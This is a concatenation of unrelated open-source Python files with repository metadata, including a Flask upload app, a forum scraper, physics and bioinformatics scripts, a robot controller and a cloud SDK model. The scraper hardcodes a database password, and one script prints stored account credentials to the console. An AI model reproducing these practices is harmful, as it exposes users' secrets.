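#           [stream, str(sem)]) for sem in range(1, 9)}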
|
[
"ritik.patle.000@gmail.com"
] |
ritik.patle.000@gmail.com
|
eb1ebfc16b9a38b3d2a5ad94b96850723860d3c8
|
02248796a099a07411557a84ce49d239ecbeffe5
|
/randomRoll/matrix.py
|
a8ccd98f8b734d0ef0ca8e6d3c8ac3a9b8023c43
|
[] |
no_license
|
HarrisonHelms/helms
|
d75699ef6dea4701c9d168407f449de155c4be99
|
fee008e752b42a81ef467c3e865eddc72894387b
|
refs/heads/master
| 2021-09-04T04:41:16.896631
| 2018-01-15T23:24:15
| 2018-01-15T23:24:15
| 109,761,616
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 285
|
py
|
from random import random
def roll():
return round(random() * 839842908294839849839834983499876543234598349898398349349834986332784983873983083972502793270934843908)
# assign the result of roll() to rolled before printing, so you don't print the function object itself
rolled = roll()
print(rolled)
|
[
"harrisonhelms@Harrisons-MacBook-Air.local"
] |
harrisonhelms@Harrisons-MacBook-Air.local
|
fa2a4673612d10290d0647f4e530246358165a25
|
5c236dd226a3f8c85a5f3d2f9e23f4cf1b82b320
|
/flaskapp/views.py
|
65f8ed7c1f487d0d89884bae5be00166736d3f9f
|
[
"MIT"
] |
permissive
|
jsbridge/makemecurly
|
2160f6491b5a44140bfc94a9cda4964177915852
|
c4fd7edb14f3a3a4d5d53f6da6d65fefc702f0b3
|
refs/heads/master
| 2020-12-14T15:40:46.245352
| 2020-02-27T02:46:07
| 2020-02-27T02:46:07
| 234,792,190
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,680
|
py
|
from flask import Flask, render_template
from flask import request, url_for, send_from_directory, redirect, flash
from werkzeug.utils import secure_filename
from flaskapp import app
from model_image import *
from query import *
import os
upload_folder = 'flaskapp/static/uploads'
app.config['UPLOAD_FOLDER'] = upload_folder
allowed_ext = set(['png', 'jpg', 'jpeg', 'gif'])
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in allowed_ext
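# allowed_file() is a case-insensitive extension check: e.g. 'curls.JPG' or
# 'photo.png' pass, while 'notes.txt' or a bare 'README' are rejected
# (file names here are illustrative).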
@app.route('/', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
# Check to see if the post request has the file part
if 'file' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['file']
# If the user does not select a file
if file.filename == '':
flash('No selected file')
return redirect(request.url)
# If everything looks good, proceed
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
filepath = os.path.join(app.config['UPLOAD_FOLDER'], filename)
file.save(filepath)
predicted_class = predict_class(filepath)
# List of classes not used in this app
bad_list = ['straight', 'unsure','braids','dreadlocks','nonhair', 'short']
if predicted_class in bad_list:
return render_template('complete.html', predicted_class = predicted_class)
# Query the product database, return products and amazon URLS for products
prods, urls = query(predicted_class)
shampoo,conditioner,leavein,gel,deep,protein,cream,serum,clarify = prods
ushampoo,uconditioner,uleavein,ugel,udeep,uprotein,ucream,userum,uclarify = urls
# Passes hair class, products, and URLS to the second HTML page
return render_template('complete.html', predicted_class = predicted_class,
shampoo = shampoo, conditioner = conditioner,
leavein = leavein, gel = gel, deep = deep, protein = protein,
cream = cream, serum = serum, clarify = clarify, ushampoo = ushampoo,
uconditioner = uconditioner, uleavein = uleavein,ugel = ugel,
udeep = udeep, ucream = ucream, userum = userum, uprotein = uprotein,
uclarify = uclarify)
return redirect(url_for('main'))
return render_template('main.html')
|
[
"jsbridge45@gmail.com"
] |
jsbridge45@gmail.com
|
313db866197ccc1a9b1e058d3d4b9be177dcc62f
|
7f48a52924cc0069090afddac0ff2d103acd107a
|
/index_frorum.py
|
93692ab31205e7e6aaf30fbfd4b6842d63cb304f
|
[] |
no_license
|
frobese/bs4-template
|
bbb63086224498a2b16fb355014f9f27a3afc395
|
b18e20fe8d8e5e2bbe97346f5f1f1fdb838a57b9
|
refs/heads/master
| 2023-03-29T01:43:41.869228
| 2020-07-17T20:00:16
| 2020-07-17T20:00:16
| 290,730,726
| 0
| 0
| null | 2021-03-31T20:20:57
| 2020-08-27T09:15:23
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 958
|
py
|
import re
import psycopg2
import urllib.request as req
from bs4 import BeautifulSoup as bs
# Connect to the database
conn = psycopg2.connect("dbname=frorum_db user=frorum password=sicheresPasswort")
cur = conn.cursor()
cur.execute("SELECT version()")
print("Verbindung zu %s hergestellt" % cur.fetchone())
# Verbindung zum Server herstellen und HTML-Datei laden
url = "https://www.frobese.de/frorum/post/"
response = req.urlopen(url)
page = response.read()
soup = bs(page, "lxml")
# Navigate the DOM
content = soup.body.find(id="content")
elements = content.find_all(class_=re.compile("card"))
posts = elements[2:]
for tag in posts:
title = tag.h5
link = title.parent.get("href")
    # Write the records to the database
cur.execute("INSERT INTO index (title, link) VALUES (%s, %s)", (title.string, link))
print("==> %s eingefügt" % title.string)
# Verbindung zur Datenbank schließen
conn.commit()
conn.close()
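# Assumed shape of the target table (this script only inserts into it):
#   CREATE TABLE index (title text, link text);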
|
[
"jvoland@frobese.de"
] |
jvoland@frobese.de
|
8aa933c8cf6d4abfc1c654e1c1bd0f83851f1fde
|
7536200883d4844220dc6fa49c5ec86c9c965a3f
|
/CMSSW_5_3_7_patch4/src/SingleTopPolarization/Analysis/python/top_step2_cfi.py
|
2049ebe98a93fb2307e0e0e997b442aaa2fe6b1f
|
[] |
no_license
|
sroecker/stpol
|
bfbb3240d7c33b8ec32d14cc69b802fffeb76995
|
aaffbca42b0cfe5899e0d7b90f62d24faa3b01f9
|
refs/heads/master
| 2020-12-24T23:54:12.257118
| 2013-09-06T14:06:43
| 2013-09-06T14:06:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,365
|
py
|
import FWCore.ParameterSet.Config as cms
def TopRecoSetup(process, leptonSource="goodSignalLeptons", bTagSource="highestBTagJet", untaggedJetSource="lowestBTagJet"):
#Reconstruct the 4-momentum of the top quark by adding the momenta of the b-jet, the neutrino and the charged lepton
#Combine the neutrino collections produced in the electron and muon paths, taking exactly 1 neutrino per event
process.recoNu = cms.EDProducer(
'CandRefCombiner',
sources=cms.untracked.vstring(["recoNuProducerMu", "recoNuProducerEle"]),
maxOut=cms.untracked.uint32(1),
minOut=cms.untracked.uint32(1)
)
process.recoTop = cms.EDProducer('SimpleCompositeCandProducer',
sources=cms.VInputTag(["recoNu", bTagSource, leptonSource])
)
process.topCount = cms.EDProducer('CollectionSizeProducer<reco::Candidate>',
src = cms.InputTag('recoTop')
)
process.cosTheta = cms.EDProducer('CosThetaProducer',
topSrc=cms.InputTag("recoTop"),
jetSrc=cms.InputTag(untaggedJetSource),
leptonSrc=cms.InputTag("goodSignalLeptons")
)
process.topRecoSequenceMu = cms.Sequence(
process.recoNuProducerMu *
process.recoNu *
process.recoTop *
process.topCount *
process.cosTheta
)
process.topRecoSequenceEle = cms.Sequence(
process.recoNuProducerEle *
process.recoNu *
process.recoTop *
process.topCount *
process.cosTheta
)
|
[
"joosep.pata@gmail.com"
] |
joosep.pata@gmail.com
|
4f8ee61efbd1aca6c91f56bfc3d5cd7c16207acd
|
a4a6ee8f949d0786f0f98ef4348c35ed38cf7e06
|
/functional5.py
|
f0e0f26f715324679eb80f487627063f5b28018d
|
[] |
no_license
|
deetchiga/pythonexercise
|
8eade8fa4277b5e84ca610d6ab144dbd20e37e98
|
f5fe4b22d3505160720f0345009f359e84089802
|
refs/heads/master
| 2020-07-12T20:26:42.846514
| 2019-08-29T11:14:04
| 2019-08-29T11:14:04
| 204,899,947
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 124
|
py
|
def finding():
x = 1
y = 2
str1= "w3resource"
print("Python Exercises")
print(finding.__code__.co_nlocals)
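# finding() defines three local variables (x, y, str1), so co_nlocals is 3
# and the print above outputs 3.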
|
[
"deetchigasoundherraj1999@gmail.com"
] |
deetchigasoundherraj1999@gmail.com
|
10b8216b5a41db869e46425edcf8e64f02ebbb41
|
b9d134e329cecfc7306c8d0a05f451f8c2aa423e
|
/view_samples.py
|
786e7fe567d1f642cc27c195c5c64cb44844a21e
|
[
"Apache-2.0"
] |
permissive
|
feynmanliang/travelling-cluster-chain
|
477a114b6097b591fbec921fab2828bcb62d1bd5
|
2442178679e8ec29ac8532205dd9640f546f87fc
|
refs/heads/master
| 2020-03-09T16:22:33.718138
| 2018-05-08T23:37:00
| 2018-05-08T23:37:00
| 128,883,113
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 976
|
py
|
#!/usr/bin/env python3
#vim:set et sw=4 ts=8:
import scipy.io
import numpy as np
import matplotlib.pyplot as plt
from glob import glob
if __name__ == '__main__':
num_workers = len(set(
x[:16] for x in glob('output/samples-*-*.mm')))
legend = []
for i in range(1,num_workers+1):
samples = []
for part in glob('output/samples-{}-*.mm'.format(i)):
samples.append(scipy.io.mmread(part))
samples = np.hstack(samples)
# samples = samples[:, np.arange(0, samples.shape[1]) % 15 == 0]
# plt.subplot(211)
# plt.plot(samples[0,:].T)
# plt.subplot(212)
# plt.subplot('22' + str(i))
plt.scatter(samples[0, :], samples[1, :], alpha=0.01)
legend.append("Worker {}".format(i))
plt.xlim(-1, 2)
plt.ylim(-3, 3)
plt.grid()
#plt.legend(legend)
plt.xlabel("$\\theta_1$")
plt.ylabel("$\\theta_2$")
plt.tight_layout()
plt.savefig('fig-samples.png')
|
[
"feynman.liang@gmail.com"
] |
feynman.liang@gmail.com
|
82ac8a96156917ad4b4d00554cd55e65464eed35
|
13ba3d799045937ef5518cca3d529272c565c41c
|
/ex/softmax/mnist.py
|
5e2e899623086716ff605a32119bd2c518fd2a5f
|
[
"MIT"
] |
permissive
|
phorsfall/ml
|
a3acbd4aba5e69990e675b39e0ce918577288abd
|
c5d5c90d84be9a8c817bb8053d71b097369c461d
|
refs/heads/master
| 2021-01-01T19:20:43.315154
| 2013-03-29T12:13:12
| 2013-03-29T18:32:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,194
|
py
|
import os.path
import functools
import numpy as np
from ml import softmax, optimize, utils, mnist, data, meta
from ml import regularization as reg
DATA_PATH = os.path.expanduser('~/Development/ml/datasets')
train, valid = mnist.load_training_dataset(DATA_PATH)
batches = data.BatchIterator(train)
num_classes = mnist.NUM_CLASSES
num_dims = train.inputs.shape[1]
initial_params = softmax.initial_params(num_classes, num_dims)
weight_decay = None # reg.l2(1e-4)
epochs = 50
learning_rate = 0.1
momentum = 0
def f(params, data):
return softmax.cost(params, data.inputs, data.targets, weight_decay)
train_accuracy = functools.partial(softmax.accuracy,
train.inputs, train.labels)
valid_accuracy = functools.partial(softmax.accuracy,
valid.inputs, valid.labels)
train_error = utils.call_func_hook(train_accuracy)
valid_error = utils.call_func_hook(valid_accuracy)
def post_epoch(*args):
train_error(*args)
valid_error(*args)
params = optimize.sgd(f, initial_params, batches,
epochs, learning_rate,
momentum=momentum,
post_epoch=post_epoch)
|
[
"horsfallp@gmail.com"
] |
horsfallp@gmail.com
|
00c6cc2cc8f935a19060171f16301233960f6e86
|
67bd366aea00b56d3b21f3bf4fb71b1ac0ed059f
|
/scripts/rename_picard_fastq.py
|
88667b462a0cc99078e74356426d38ea723efbe8
|
[] |
no_license
|
AlaaALatif/bwa_pipeline
|
b6ec7f34ccbd231eec4f8a51528a60a2ae27c473
|
348632de11313a34e48810fca6e1987c758a2298
|
refs/heads/master
| 2023-04-21T16:39:59.553996
| 2021-05-05T00:59:01
| 2021-05-05T00:59:01
| 336,109,095
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,915
|
py
|
import glob
import shutil
import argparse
from path import Path
def rename_picard_fastq(fastq_filepaths: list, lane: str, destination_folder: str):
for fp in fastq_filepaths:
s_id = fp.split('/')[-1].split('.')[0]
_rnd = fp.split('/')[-1].split('.')[1]
if len(_rnd)==1:
rnd = f"R{fp.split('/')[-1].split('.')[1]}"
else:
rnd = fp.split('/')[-1].split('.')[1].replace('barcode_', 'I')
new_filename = f'{s_id}_S0_{lane}_{rnd}_001.fastq.gz'
new_fp = f'{destination_folder}/{new_filename}'
shutil.move(fp, new_fp)
# print(new_fp)
return 0
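# Examples of the renaming scheme implemented above (paths are illustrative):
#   out/lane_1_tmp/sampleA.1.fastq.gz         -> out/all_fastqs/sampleA_S0_L001_R1_001.fastq.gz
#   out/lane_1_tmp/sampleA.barcode_1.fastq.gz -> out/all_fastqs/sampleA_S0_L001_I1_001.fastq.gz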
if __name__=="__main__":
parser = argparse.ArgumentParser()
    parser.add_argument('-o', "--out-dir", type=str, required=True,
                        help="Output directory containing Picard's fastq files")
args = parser.parse_args()
    # output directory produced by the Picard demultiplexing step
out_dir = args.out_dir
    if not Path(out_dir).isdir():
raise ValueError("The user-specified output directory (arg --out-dir) does not Exist. Operations aborted.")
l1_fastq_fps = glob.glob(f'{out_dir}/lane_1_tmp/*.fastq.gz')
if len(l1_fastq_fps)==0:
raise ValueError("The user-specified output directory (arg --out-dir) does not contain FASTQ files for lane 1. Operations aborted.")
rename_picard_fastq(l1_fastq_fps, lane='L001', destination_folder=f'{out_dir}/all_fastqs')
print(f"Lane 1 FASTQ files renamed and stored in all_fastqs folder")
l2_fastq_fps = glob.glob(f'{out_dir}/lane_2_tmp/*.fastq.gz')
if len(l2_fastq_fps)==0:
raise ValueError("The user-specified output directory (arg --out-dir) does not contain FASTQ files for lane 2. Operations aborted.")
rename_picard_fastq(l2_fastq_fps, lane='L002', destination_folder=f'{out_dir}/all_fastqs')
print(f"Lane 2 FASTQ files renamed and stored in all_fastqs folder")
|
[
"al.a.latif.94@gmail.com"
] |
al.a.latif.94@gmail.com
|
b4cc9dc13cf5cc068ee35ecbc4d4aaece2635b11
|
51f1da501607d29301aa28928704aa116832989c
|
/hello_cython/setup.py
|
bd219fd0e205bf35ee1f0b4d1bd972d13b86562f
|
[] |
no_license
|
alisure-ml/python-cython
|
8744b14dfcf6b4a190a333041e2a82c105a6c391
|
fa9ba45a165fdcb536b12df74979967fda04e463
|
refs/heads/master
| 2021-05-15T04:34:58.337856
| 2018-01-27T10:15:09
| 2018-01-27T10:15:09
| 118,907,881
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 236
|
py
|
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
setup(
name="Hello pyx",
cmdclass={'build_ext': build_ext},
ext_modules=[Extension("hello",["hello.pyx"])]
)
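# Typical build command for this setup script (run from the project directory):
#   python setup.py build_ext --inplace
# after which the compiled extension can be imported with `import hello`.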
|
[
"562282219@qq.com"
] |
562282219@qq.com
|
4ad4e2e1b2d66fb1ae290b0f303ce42f6117080a
|
d3c26a334817b2b4784d106f386a539ae3d7b466
|
/Week_04/Search_in_Rotated_Sorted_Array.py
|
2858d4207620477ae2d2cfbb6c0808332ca4f097
|
[] |
no_license
|
jj-leetcode/algorithm011-class01
|
9f33a7a26021da50f9edd0e410f2b8122830c196
|
2807728f373ed04060f86a99aa83900f860c0fdc
|
refs/heads/master
| 2022-11-24T12:55:18.612093
| 2020-07-26T09:52:51
| 2020-07-26T09:52:51
| 275,103,042
| 0
| 0
| null | 2020-06-26T07:55:19
| 2020-06-26T07:55:19
| null |
UTF-8
|
Python
| false
| false
| 819
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
class Solution(object):
def search(self, nums, target):
l, r = 0, len(nums) - 1
while l <= r:
            mid = l + (r-l) // 2
#print(mid, l, r)
if nums[mid] == target:
return mid
elif nums[mid] < target:
if nums[mid] < nums[r] and target <= nums[r] or nums[l] < nums[mid] and nums[l] < target:
l = mid + 1
else:
r = mid - 1
else:
if nums[mid] > nums[l] and target >= nums[l] or nums[r] > nums[mid] and nums[r] > target:
r = mid - 1
else:
l = mid + 1
return -1
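# Trace for the test below (nums = [5,1,3], target = 3): first pass mid = 1,
# nums[1] = 1 < 3 and target <= nums[r], so l moves to 2; second pass mid = 2
# and nums[2] == 3, so index 2 is returned.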
t = 3
nums = [5,1,3]
print(Solution().search(nums, t))
|
[
"jj_leetcode@163.com"
] |
jj_leetcode@163.com
|
fb65e59bf2ec69a568e7d017fbfd2c6843b9e370
|
d2498344d98ebe2c1e899a73084a9c0b8cd6dbfa
|
/examples/trading_hours.py
|
9296470016f2f6dc8ad62d5a73fb0419517d0aa4
|
[] |
no_license
|
pablomedrano10/CS597-FinanceProject
|
0e2c6a6485385d7bf8e46b9a4c16977afa841116
|
7b64ba46e900618a18a228dc83727c84fe0b64ac
|
refs/heads/master
| 2020-03-21T06:41:02.715886
| 2018-07-26T03:01:50
| 2018-07-26T03:01:50
| 138,235,014
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 319
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 18 20:32:04 2018
@author: pablo
"""
import datetime
from os import environ
print(datetime.datetime.now().hour)
print(datetime.datetime.now().minute)
print(datetime.datetime.now())
print(environ.get('RH_USER'))
print(environ.get('RH_PASSWORD'))
|
[
"pablo.medrano@outlook.com"
] |
pablo.medrano@outlook.com
|
cbb0a64fd04f64315d2acf9c61fb5872b362e85f
|
6732c13c07ba62a397298795339ba0acad01ca27
|
/Coding/Sandbox source code/toddler_komal.py
|
d0398c05688a45d037ad8e329416ef57d6512c3c
|
[] |
no_license
|
eeyzl5/mobile-robot-localization-challenge
|
597e16a38a0db9fdebcbd171d8fe4cb6f4300aac
|
103259eaed61a63c3863b1276347e639c3e3270b
|
refs/heads/master
| 2020-06-20T00:34:55.569531
| 2019-07-15T05:46:05
| 2019-07-15T05:46:05
| 196,928,937
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,871
|
py
|
#!/usr/bin/env python
import time
import math
class Toddler:
__version = '2018a'
def __init__(self, IO):
print('[Toddler] I am toddler {} playing in a sandbox'.format(Toddler.__version))
self.camera = IO.camera.initCamera('pi', 'low')
self.getInputs = IO.interface_kit.getInputs
self.getSensors = IO.interface_kit.getSensors
self.mc = IO.motor_control
self.sc = IO.servo_control
self.hall_init()
self.poi_init()
self.odometer = 0
def control(self):
self.odometer = self.hall_counter()
# print('{}\t{}'.format("Hall Counter: ",self.hcounter))
# print('{}\t{}'.format("Odometer: ",self.odometer))
# print('{}\t{}'.format(self.getSensors(), self.getInputs()))
# print('{}\t{}'.format("IR sensor: ",self.getSensors()[6]))
# self.poi_detect()
# self.set_move(10)
vals_t = self.cal_angle( 1,5,"east")
# self.set_turn("left",vals_t[0])
self.sc.engage()
self.sc.setPosition(vals_t[1])
# self.cal_angle( 200,300,"north")
# self.set_turn("left",4)
# self.sc.engage()
# self.sc.setPosition(0 if self.getSensors()[0] >= 500 else 180)
# time.sleep(0.05)
def vision(self):
# image = self.camera.getFrame()
# self.camera.imshow('Camera', image)
time.sleep(0.05)
###################################################
# Hall Counter #
###################################################
def hall_init(self):
self.hcounter = 0
self.mc.stopMotors() # Stop the motor and get the first samples of hall sensors
self.hall_now = self.getInputs()[7]
time.sleep(0.5)
self.hall_pre = self.getInputs()[7]
def hall_counter(self):
self.hall_now = self.getInputs()[7]
self.diff = self.hall_now - self.hall_pre
self.hall_pre = self.hall_now
if self.diff != 0:
self.hcounter += 1
        return (self.hcounter)*2.5 + 2.2  # return the exact distance in cm
####################################################
# POI detection #
####################################################
def poi_init(self):
self.flag = 0
self.mc.setMotor(1,100) # turn on the light bulb
def poi_detect(self):
# both of the front light sensors should be on POI first
if self.getSensors()[0] > 40 and self.getSensors()[1] > 40:
self.flag = 1 # set a flag if so
if (self.getSensors()[2] > 15 or (self.getSensors()[0] <40 and self.getSensors()[1] < 40)) and self.flag == 1:
self.mc.stopMotors()
if self.flag != 1:
self.mc.setMotor(2,100)
self.mc.setMotor(4,100)
#####################################################
# Close loop Controls #
#####################################################
def set_move(self, number_of_counts):
number_of_counts = number_of_counts - (1 if self.hcounter < 5 else 2)
if self.hcounter > number_of_counts:
self.mc.stopMotors()
else:
self.mc.setMotor(2,100)
self.mc.setMotor(4,100)
def set_turn(self, direction, number_of_counts):
if direction == "left":
direction = 1
elif direction == "right":
direction = -1
else:
direction = 0
if self.hcounter > number_of_counts-1:
self.mc.stopMotors()
else:
self.mc.setMotor(2, direction*100)
self.mc.setMotor(4, (-1)*direction*100)
def cal_angle(self, segx,segy,dir):
num_rows = 420
num_col = 320
dir_ang = 0
x1 = 400
y1 = 170
est_loc = self.arena_map(segx, segy)
x = est_loc[0]
y = est_loc[1]
print('est x {}:'.format(x))
print('est y {}:'.format(y))
angle_vert = math.floor (math.degrees ( math.atan2(x1-x,y1-y)))
#v_ang= 300 / math.sqrt( ( (x1-x)*(x1-x) )+ ( (y1-y) * (y1-y) ) )
angle_hor = math.degrees ( math.atan2(300, math.sqrt( ( (x1-x)*(x1-x) )+ ( (y1-y) * (y1-y) ) )) )
print('vertical angle: {}.'.format(angle_vert))
print('horizontal angle: {}'.format(angle_hor))
if dir == "north":
dir_ang = math.floor((angle_vert)/20)
if dir == "south":
dir_ang = math.floor((angle_vert+180)/20)
if dir == "east":
dir_ang = math.floor((angle_vert+90)/20)
if dir == "west":
dir_ang = math.floor((angle_vert+270)/20)
print('normalized angle {}'.format(dir_ang))
estimated_angle = [dir_ang , angle_hor]
return estimated_angle
def arena_map(self, x,y):
seg_x = 85
seg_y = 64
#arena = [[0 for x in range(5)] for j in range(5)]
loc_seg_x = math.floor((x-1)*85 + (85/2))
loc_seg_y = math.floor((y-1)*64 + (64/2))
pos_est = [loc_seg_x, loc_seg_y]
return pos_est
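# Worked example for arena_map (values follow directly from the code above):
# arena_map(1, 5) returns the centre of grid segment (1, 5), i.e.
# x = floor(0*85 + 42.5) = 42 and y = floor(4*64 + 32) = 288 arena units,
# which cal_angle() then uses as the estimated robot location.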
|
[
"noreply@github.com"
] |
eeyzl5.noreply@github.com
|
593b489ee83bde16fcc5d65ffe4c72aad59d7770
|
a2d36e471988e0fae32e9a9d559204ebb065ab7f
|
/huaweicloud-sdk-meeting/huaweicloudsdkmeeting/v1/model/search_attendance_records_of_his_meeting_request.py
|
624df1a0781f30c87349f05c3bc27ad2c9d89bdf
|
[
"Apache-2.0"
] |
permissive
|
zhouxy666/huaweicloud-sdk-python-v3
|
4d878a90b8e003875fc803a61414788e5e4c2c34
|
cc6f10a53205be4cb111d3ecfef8135ea804fa15
|
refs/heads/master
| 2023-09-02T07:41:12.605394
| 2021-11-12T03:20:11
| 2021-11-12T03:20:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,522
|
py
|
# coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class SearchAttendanceRecordsOfHisMeetingRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'conf_uuid': 'str',
'offset': 'int',
'limit': 'int',
'search_key': 'str',
'user_uuid': 'str',
'x_authorization_type': 'str',
'x_site_id': 'str',
'accept_language': 'str'
}
attribute_map = {
'conf_uuid': 'confUUID',
'offset': 'offset',
'limit': 'limit',
'search_key': 'searchKey',
'user_uuid': 'userUUID',
'x_authorization_type': 'X-Authorization-Type',
'x_site_id': 'X-Site-Id',
'accept_language': 'Accept-Language'
}
def __init__(self, conf_uuid=None, offset=None, limit=None, search_key=None, user_uuid=None, x_authorization_type=None, x_site_id=None, accept_language=None):
"""SearchAttendanceRecordsOfHisMeetingRequest - a model defined in huaweicloud sdk"""
self._conf_uuid = None
self._offset = None
self._limit = None
self._search_key = None
self._user_uuid = None
self._x_authorization_type = None
self._x_site_id = None
self._accept_language = None
self.discriminator = None
self.conf_uuid = conf_uuid
if offset is not None:
self.offset = offset
if limit is not None:
self.limit = limit
if search_key is not None:
self.search_key = search_key
if user_uuid is not None:
self.user_uuid = user_uuid
if x_authorization_type is not None:
self.x_authorization_type = x_authorization_type
if x_site_id is not None:
self.x_site_id = x_site_id
if accept_language is not None:
self.accept_language = accept_language
@property
def conf_uuid(self):
"""Gets the conf_uuid of this SearchAttendanceRecordsOfHisMeetingRequest.
        Conference UUID.
:return: The conf_uuid of this SearchAttendanceRecordsOfHisMeetingRequest.
:rtype: str
"""
return self._conf_uuid
@conf_uuid.setter
def conf_uuid(self, conf_uuid):
"""Sets the conf_uuid of this SearchAttendanceRecordsOfHisMeetingRequest.
        Conference UUID.
:param conf_uuid: The conf_uuid of this SearchAttendanceRecordsOfHisMeetingRequest.
:type: str
"""
self._conf_uuid = conf_uuid
@property
def offset(self):
"""Gets the offset of this SearchAttendanceRecordsOfHisMeetingRequest.
        Index of the first record to return. Must be greater than or equal to 0; default is 0.
:return: The offset of this SearchAttendanceRecordsOfHisMeetingRequest.
:rtype: int
"""
return self._offset
@offset.setter
def offset(self, offset):
"""Sets the offset of this SearchAttendanceRecordsOfHisMeetingRequest.
        Index of the first record to return. Must be greater than or equal to 0; default is 0.
:param offset: The offset of this SearchAttendanceRecordsOfHisMeetingRequest.
:type: int
"""
self._offset = offset
@property
def limit(self):
"""Gets the limit of this SearchAttendanceRecordsOfHisMeetingRequest.
        Number of records to return; default is 20, maximum is 500.
:return: The limit of this SearchAttendanceRecordsOfHisMeetingRequest.
:rtype: int
"""
return self._limit
@limit.setter
def limit(self, limit):
"""Sets the limit of this SearchAttendanceRecordsOfHisMeetingRequest.
        Number of records to return; default is 20, maximum is 500.
:param limit: The limit of this SearchAttendanceRecordsOfHisMeetingRequest.
:type: int
"""
self._limit = limit
@property
def search_key(self):
"""Gets the search_key of this SearchAttendanceRecordsOfHisMeetingRequest.
        String used as the search keyword.
:return: The search_key of this SearchAttendanceRecordsOfHisMeetingRequest.
:rtype: str
"""
return self._search_key
@search_key.setter
def search_key(self, search_key):
"""Sets the search_key of this SearchAttendanceRecordsOfHisMeetingRequest.
        String used as the search keyword.
:param search_key: The search_key of this SearchAttendanceRecordsOfHisMeetingRequest.
:type: str
"""
self._search_key = search_key
@property
def user_uuid(self):
"""Gets the user_uuid of this SearchAttendanceRecordsOfHisMeetingRequest.
        UUID of the user (already registered with the USG).
:return: The user_uuid of this SearchAttendanceRecordsOfHisMeetingRequest.
:rtype: str
"""
return self._user_uuid
@user_uuid.setter
def user_uuid(self, user_uuid):
"""Sets the user_uuid of this SearchAttendanceRecordsOfHisMeetingRequest.
        UUID of the user (already registered with the USG).
:param user_uuid: The user_uuid of this SearchAttendanceRecordsOfHisMeetingRequest.
:type: str
"""
self._user_uuid = user_uuid
@property
def x_authorization_type(self):
"""Gets the x_authorization_type of this SearchAttendanceRecordsOfHisMeetingRequest.
        Indicates whether the request comes from a third-party portal.
:return: The x_authorization_type of this SearchAttendanceRecordsOfHisMeetingRequest.
:rtype: str
"""
return self._x_authorization_type
@x_authorization_type.setter
def x_authorization_type(self, x_authorization_type):
"""Sets the x_authorization_type of this SearchAttendanceRecordsOfHisMeetingRequest.
        Indicates whether the request comes from a third-party portal.
:param x_authorization_type: The x_authorization_type of this SearchAttendanceRecordsOfHisMeetingRequest.
:type: str
"""
self._x_authorization_type = x_authorization_type
@property
def x_site_id(self):
"""Gets the x_site_id of this SearchAttendanceRecordsOfHisMeetingRequest.
        Identifies which HCSO site to authenticate against.
:return: The x_site_id of this SearchAttendanceRecordsOfHisMeetingRequest.
:rtype: str
"""
return self._x_site_id
@x_site_id.setter
def x_site_id(self, x_site_id):
"""Sets the x_site_id of this SearchAttendanceRecordsOfHisMeetingRequest.
        Identifies which HCSO site to authenticate against.
:param x_site_id: The x_site_id of this SearchAttendanceRecordsOfHisMeetingRequest.
:type: str
"""
self._x_site_id = x_site_id
@property
def accept_language(self):
"""Gets the accept_language of this SearchAttendanceRecordsOfHisMeetingRequest.
        Language. Default is Simplified Chinese. - zh-CN: Simplified Chinese. - en-US: US English.
:return: The accept_language of this SearchAttendanceRecordsOfHisMeetingRequest.
:rtype: str
"""
return self._accept_language
@accept_language.setter
def accept_language(self, accept_language):
"""Sets the accept_language of this SearchAttendanceRecordsOfHisMeetingRequest.
        Language. Default is Simplified Chinese. - zh-CN: Simplified Chinese. - en-US: US English.
:param accept_language: The accept_language of this SearchAttendanceRecordsOfHisMeetingRequest.
:type: str
"""
self._accept_language = accept_language
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SearchAttendanceRecordsOfHisMeetingRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
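# Minimal usage sketch (field values are illustrative):
#   req = SearchAttendanceRecordsOfHisMeetingRequest(conf_uuid='xxxx', limit=50)
#   print(req.to_str())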
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
069a8a88922ef656309b5d3a8cbab432170abd44
|
b3ed6d9a0d88a6c1ab795f89280276dbd252fc10
|
/python/examples/segnet-console.py
|
6d7c3ffe561d31504a87799b58923536528ff5be
|
[
"MIT"
